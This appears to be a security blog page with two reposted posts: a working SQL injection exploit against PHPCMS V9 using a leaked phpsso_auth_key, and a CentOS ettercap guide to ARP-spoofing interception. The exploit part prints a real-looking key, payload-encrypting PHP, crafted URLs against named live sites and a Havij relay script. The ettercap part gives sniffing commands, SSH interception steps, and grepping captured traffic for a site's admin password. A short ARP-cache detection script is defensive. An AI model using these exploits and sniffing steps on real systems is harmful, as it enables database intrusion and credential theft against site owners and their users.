Published: May 19, 2015 // Categories: PHP, code study, reposts // 1 Comment

phpcms phpsso_auth_key leak: WooYun: PHPCMS V9 一个为所欲为的漏洞

http://www.2cto.com/phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=662dCAZSAwgFUlUJBAxbVQJXVghTWVQHVFMEV1MRX11cBFMKBFMGHkUROlhBTVFuW1FJBAUVBwIXRlgeERUHQVlIUVJAA0lRXABSQEwNXAhZVl5V

1.png

phpsso_auth_key: 0tagvqnxuq1x8x4jvaziib7yx4e9ibnl

Since GPC is off, SQL injection becomes possible.

Encrypt the payload with the authkey:

<?php

function sys_auth($string, $operation = 'ENCODE', $key = '', $expiry = 0) {
    $key_length = 4;
    $key = md5($key != '' ? $key : pc_base::load_config('system', 'auth_key'));
    $fixedkey = md5($key);
    $egiskeys = md5(substr($fixedkey, 16, 16));
    $runtokey = $key_length ? ($operation == 'ENCODE' ? substr(md5(microtime(true)), -$key_length) : substr($string, 0, $key_length)) : '';
    $keys = md5(substr($runtokey, 0, 16) . substr($fixedkey, 0, 16) . substr($runtokey, 16) . substr($fixedkey, 16));
    $string = $operation == 'ENCODE' ? sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$egiskeys), 0, 16) . $string : base64_decode(substr($string, $key_length));

    $i = 0; $result = '';
    $string_length = strlen($string);
    for ($i = 0; $i < $string_length; $i++){
        $result .= chr(ord($string{$i}) ^ ord($keys{$i % 32}));
    }

    if($operation == 'ENCODE') {
        return $runtokey . str_replace('=', '', base64_encode($result));
    } else {
        if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$egiskeys), 0, 16)) {
            return substr($result, 26);
        } else {
            return '';
        }
    }
}

echo sys_auth("action=synlogin&uid=' and updatexml(1,concat('~',user()),1)#", 'ENCODE', '0tagvqnxuq1x8x4jvaziib7yx4e9ibnl');
http://www.2cto.com/api.php?op=phpsso&code=6f56BQgIUVQDVAkGUwEFCgwDAwNSAVBdA1UHD1RSURFZDlgIS0EPCFwDUFhFFl1dCBMWVlkHE0xDUFJDBktfCRhQGlZXVgIFR0weSERPQUpQRh4eHk8CEBA

2.png

I saw someone claim the phpcms authkey cannot be used for injection, so I quickly put together a relay script:

<?php
set_time_limit(0);
$wang_url = 'http://www.0day5.com';

$auth_key = 'xxxxxxxxxxxxxxxxxxxxxxxxxxxx';

$str = "uid=1".stripslashes($_GET['id']);
$encode = sys_auth($str, 'ENCODE', $auth_key);
$content = file_get_contents($wang_url."/phpsso_server/?m=phpsso&c=index&a=getuserinfo&appid=1&data=".$encode);
echo $content;
function sys_auth($string, $operation = 'ENCODE', $key = '', $expiry = 0) {
         $key_length = 4;
         $key = md5($key);
         $fixedkey = hash('md5', $key);
         $egiskeys = md5(substr($fixedkey, 16, 16));
         $runtokey = $key_length ? ($operation == 'ENCODE' ? substr(hash('md5', microtime(true)), -$key_length) : substr($string, 0, $key_length)) : '';
         $keys = hash('md5', substr($runtokey, 0, 16) . substr($fixedkey, 0, 16) . substr($runtokey, 16) . substr($fixedkey, 16));
         $string = $operation == 'ENCODE' ? sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$egiskeys), 0, 16) . $string : base64_decode(substr($string, $key_length));
         $i = 0; $result = '';
         $string_length = strlen($string);
         for ($i = 0; $i < $string_length; $i++){
                   $result .= chr(ord($string{$i}) ^ ord($keys{$i % 32}));
         }
         if($operation == 'ENCODE') {
                   return $runtokey . str_replace('=', '', base64_encode($result));
         } else {
                   if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$egiskeys), 0, 16)) {
                            return substr($result, 26);
                   } else {
                            return '';
                   }
         }
}
?>

To use it, fill in the target's www address and the key, then point Havij at it and let it run.

Installing and using ettercap on CentOS

Published: May 12, 2015 // Categories: work log, linux, reposts // No Comments

1. Download and install the EPEL RPM package.

rpm -ivh http://dl.fedoraproject.org/pub/epel/5/i386/epel-release-5-4.noarch.rpm
rpm -ivh http://dl.fedoraproject.org/pub/epel/6/i386/epel-release-6-8.noarch.rpm

2. Install ettercap

yum -y install ettercap

Start sniffing

Enable forwarding (may not be needed)

echo 1 > /proc/sys/net/ipv4/ip_forward

Sniff

ettercap -T -i eth0 -M arp:remote /192.168.1.1/ /192.168.1.41/80 -m /var/tmp/log.txt
ettercap -T -M arp /目标ip/80 /网关/ -w /tmp/log.txt
ettercap -i eth0 -Tq -M arp:remote /// ///

ettercap -T -M arp /192.168.1.41//80 /192.168.1.1//

Sniffing may take quite a while, so it can be run in the background:

nohup ettercap -T -M arp /目标ip/80 /网关/ -m /tmp/log.txt

Keep the complete packets:
ettercap -T -i eth0 -M arp:remote /192.168.1.1/ /192.168.1.41/ -L /var/cache/yum/sniffed_data

Then use etterlog to convert the data.

Commonly used commands:

etterlog -A sniffed_data.ecp >1.txt
This converts the log data produced by ettercap into displayable data, saved in 1.txt.

etterlog -B sniffed_data.ecp >1.data
This dumps the data to a file unmodified.

If a field you need is not included, the configuration can be edited:
/usr/share/ettercap/etter.fields

 

About ettercap
Sniffing: it has five working modes
-a --arpsniff ARP-based spoofing, in three sub-types: arpbased, smartarp and publicarp
-s --sniff IP-based; the target can be any host
-m --macsniff MAC-based
Note that -s and -m give the traditional sniffing modes, based on IP address and MAC address respectively. That means they must first put the NIC into promiscuous mode before they can work, so in a switched environment these two options are completely ineffective. The -a option is based on ARP spoofing, a man-in-the-middle attack model. In essence it exploits a weakness in the ARP protocol: the attacker deceives both host A and host B so that A sends its data to the sniffer, which then forwards it to B; neither A nor B is aware of the relay, so the traffic can be captured and even modified.

The five usages are described below:
1: ettercap -Nza ip1 ip2 mac1 mac2 (arpbased) intercepts traffic between IP1 and IP2. By default only TCP packets are captured.

2: ettercap -Na ip mac (smartarp) intercepts all traffic between this IP and the outside. This method is rather aggressive: at startup it uses an ARP storm and is easily noticed. If someone is watching with TCPDUMP they will see countless ARP requests from the attacker, and even the dullest administrator will understand what is happening. However, since it rewrites the monitored host's entry in the ARP tables of the specified hosts and also rewrites those hosts' entries in the monitored host's table, you are in a full man-in-the-middle position and can do more, such as altering packets or intercepting SSH passwords.

3: ettercap -Nza ip mac (publicarp) same as above, differing in how ARP requests are sent: the previous mode uses ARP broadcast, whereas this one sends ARP requests only to specific hosts, which is less likely to arouse the administrator's suspicion. It does bring a problem: the monitored host itself also receives the reply sent by broadcast and pops up a warning like "IP address conflict with hardware address detected". This does not affect the target host's normal communication. Another point is that packets addressed to the monitored host are delivered to the sniffer, while packets sent by the monitored host go directly to the real destination without passing through the sniffer, so only part of the conversation is captured.

4: ettercap -Nzs IP:80 (ipbased sniffing) IP-based sniffing. Here only the target machine's HTTP traffic is captured; you can specify another port, such as 23. If none is given, everything is captured.

5: ettercap -zm mac1 mac2 (macbased) MAC-based sniffing; just enter the MAC addresses.
Note that modes 4 and 5 only work on shared (hub) networks and are useless on switched networks. Getting a MAC address is easy: typing "ettercap -l" in a terminal lists every online host. Or PING an IP first, whether or not it replies (no reply may mean the other side runs a firewall), then use the ARP command to read its MAC. If no MAC can be obtained the IP does not exist; this is also a good way to tell whether a host behind a firewall is online.
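As an added example from the defender's side (not part of the original post), this shell script reads two constructed `arp -an` snapshots taken before and after the ARP-based interception described above and reports the two cache symptoms it leaves behind: entries whose hardware address changed, and one MAC answering for several IPs. The addresses, MACs and function names are constructed assumptions.

```shell
#!/bin/sh
# Added example: spot ARP-cache symptoms of an ARP-based man-in-the-middle.
# Both snapshots are constructed sample data in `arp -an` format, not real captures.
BEFORE='? (192.168.1.1) at 00:11:22:33:44:55 [ether] on eth0
? (192.168.1.41) at aa:bb:cc:dd:ee:01 [ether] on eth0
? (192.168.1.50) at aa:bb:cc:dd:ee:02 [ether] on eth0'
# After poisoning, the gateway and the victim both resolve to the relay host's MAC.
AFTER='? (192.168.1.1) at aa:bb:cc:dd:ee:02 [ether] on eth0
? (192.168.1.41) at aa:bb:cc:dd:ee:02 [ether] on eth0
? (192.168.1.50) at aa:bb:cc:dd:ee:02 [ether] on eth0'

# arp_pairs SNAPSHOT -> "ip mac" per line, parsed from arp -an style output
arp_pairs() {
    printf '%s\n' "$1" | awk '/ at /{gsub(/[()]/, "", $2); print $2, $4}'
}

# changed_macs BEFORE AFTER -> "ip old_mac -> new_mac" for every IP whose
# hardware address differs between the two snapshots (a rewritten entry)
changed_macs() {
    arp_pairs "$1" | while read -r ip mac; do
        new=$(arp_pairs "$2" | awk -v ip="$ip" '$1 == ip {print $2}')
        if [ -n "$new" ] && [ "$new" != "$mac" ]; then
            echo "$ip $mac -> $new"
        fi
    done
}

# shared_macs SNAPSHOT -> MACs that answer for more than one IP, which is how a
# host relaying traffic between victim and gateway shows up in the cache
shared_macs() {
    arp_pairs "$1" | awk '{print $2}' | sort | uniq -c | awk '$1 > 1 {print $2}'
}

echo "entries whose MAC changed:"; changed_macs "$BEFORE" "$AFTER"
echo "MACs claiming several IPs:"; shared_macs "$AFTER"
```

On a real host, feed `arp -an` output captured at intervals into the two functions; a gateway entry that flips to another MAC is the classic sign of mode 2 or 3 above.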

Packet filtering: network traffic is huge, and faced with a large volume of recorded data you may feel at a loss; finding the data you need is hard work. Here we can load our own filter rules with the -F option so that much useless data is ignored or trimmed. As with character injection, when filtering packets we must also pay attention, where necessary, to correct TCP sequence and acknowledgment numbers. Once your filter chain is loaded you can purposefully obtain the data you most need. A filter rule looks something like an assembly program, though not quite; an array may be a better description. A rule roughly looks like: <protocol, source port, destination port, payload>. An empty search string always matches; for example, if no port is specified, everything is recorded. As long as the rules match, your filter chain does its work.

For example, given the following data stream:
packet 1: "var1=123&var2=400"
packet 2: "var1=124&var2=420"
packet 3: "var1=125&var2=460"
packet 4: "var1=126&var2=540"
packet 5: "var1=127&var2=700"
......
......
we can write the following rule:
Search: "var1=[3*]"
Replace: "var1=000"
and the filtered stream becomes:
packet 1: "var1=000&var2=400"
packet 2: "var1=000&var2=420"
packet 3: "var1=000&var2=460"
packet 4: "var1=000&var2=540"
packet 5: "var1=000&var2=700"
If nothing is specified after "var1", the default is "var1=000".
Finally, on sniffing SSH:
Since the transmitted data is encrypted, we must hold the key ourselves. Concretely: first intercept the server's public key and set it aside, then generate a public key of our own to encrypt the traffic between this machine and the client. Data received from the client can then be decrypted, re-encrypted with the server's public key and sent on to the server, swapping one key for the other.

Three: working parameters:
Its main options are listed below; it has 28 in total, but for space only the commonly used ones are shown:
-N --simple non-interactive mode, very commonly used
-z --silent silent mode (no ARP storm at startup)
-O --passive passive sniffing
-b --broadping broadcast PING instead of ARP PING
-S --spoof send ARP requests from the address IP1 to obtain information about other machines
-H --hosts IPs of the hosts to sniff; there can be many
-n --netmask scan the subnet determined by the given netmask
-v --version check for the latest version
-h --help help text
Combinable options (generally executed together with N)
-u --udp sniff UDP data; the default is TCP
-p --plugin run the plugin with the given name
-l --list list the IP and MAC of every online host. In effect it sends 255 ARP requests and waits for replies; if your netmask is 255.255.0.0 it sends 255*255 requests, which is an ARP storm!

-C --collect collect only usernames and their passwords. Eg: ettercap -NCzs IP:port. The syntax is not strict, so leaving out IP or PORT does not matter.
-c --check check whether any other machine on the network is sniffing
-x --hexview show data in hexadecimal, which is convenient if you want to build a packet yourself, for example by creating a file containing "\x01\x02\x00\x00\xFF\xFF\x00\x02here the pass". Note: ettercap can create packets as well as sniff them, so you can alter any piece of data passing through your machine.
-L --logtofile log all data to the given location
-k --newcert create a new CERT file for HTTPS attacks
-F --filter load filter rules from the given file
-f --fingerprint OS detection for the given host, using nmap's database, so accuracy is assured, though it sometimes cannot identify the OS.
-t --linktype determine what kind of network environment you are in, switched or hub

6 Data filtering

Because this site's traffic was huge, over 1 GB per hour, grep was used to filter it.

Packet analysis showed that the password field submitted by the target site's front end is pwd:

cat /tmp/log.txt | grep -a "&pwd=" | more

I checked every few hours; after half a day the back-end password had been sniffed, along with the back-end address:

http://www.xxx.com/xxx/login.php

 
